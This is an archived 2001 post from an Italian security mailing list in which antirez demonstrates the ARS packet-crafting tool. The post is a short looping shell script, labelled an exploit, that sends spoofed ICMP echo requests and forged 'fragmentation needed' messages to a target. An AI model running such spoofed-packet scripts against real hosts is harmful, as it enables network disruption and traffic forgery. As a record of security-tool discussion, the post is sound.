[ Home | Liste | F.A.Q. |
Risorse | Cerca... ]
[ Data: precedente | successivo | indice ] [ Argomento: precedente | successivo | indice ]
[ Home | Liste | F.A.Q. |
Risorse | Cerca... ]
Archivio: Gennaio 2001 ml@sikurezza.org Soggetto: Re: ARS Mittente: antirez Data: 30 Jan 2001 12:39:08 -0000
On Tue, Jan 30, 2001 at 09:05:45AM +0100, Kundera wrote:
> Interessante, quindi potrai definire in piena liberta' (anche in modo
> fantasioso :) ) l'header IP + opzioni e riempirlo con il payload che desideri?
Perfetto. Esempio di programma che usa ARS:
(Exploit per l'ICMP DF but blabla spoofing)
#!/bin/sh
while [ 1 ]; do
./example2 "ip{saddr=$1,daddr=$2,id=10,ttl=64}+icmp{type=8,code=0,seq=10,id=10}+data{str="AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"}"
sleep 1
./example2 "ip{saddr=$1,daddr=$2,id=10,ttl=64}+icmp{type=3,code=4}+ip{saddr=$2,daddr=$1,tos=0x40,id=10,ttl=64}+icmp{type=0,code=0,seq=10,id=10}+data{str="AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"}"
sleep 1
done
Sono supportate anche le opzioni IP e TCP, ma non centrano con l'esempio.
ciao,
antirez
--
Salvatore Sanfilippo | <antirez@invece.org>
http://www.kyuzz.org/antirez | PGP: finger antirez@tella.alicom.com
--------------------------------------------------------------------------
informazioni sui comandi supportati da questa ml: http://www.sikurezza.org
[ Home | Liste | F.A.Q. |
Risorse | Cerca... ]
www.sikurezza.org - Italian Security Mailing List
(c) 1999-2005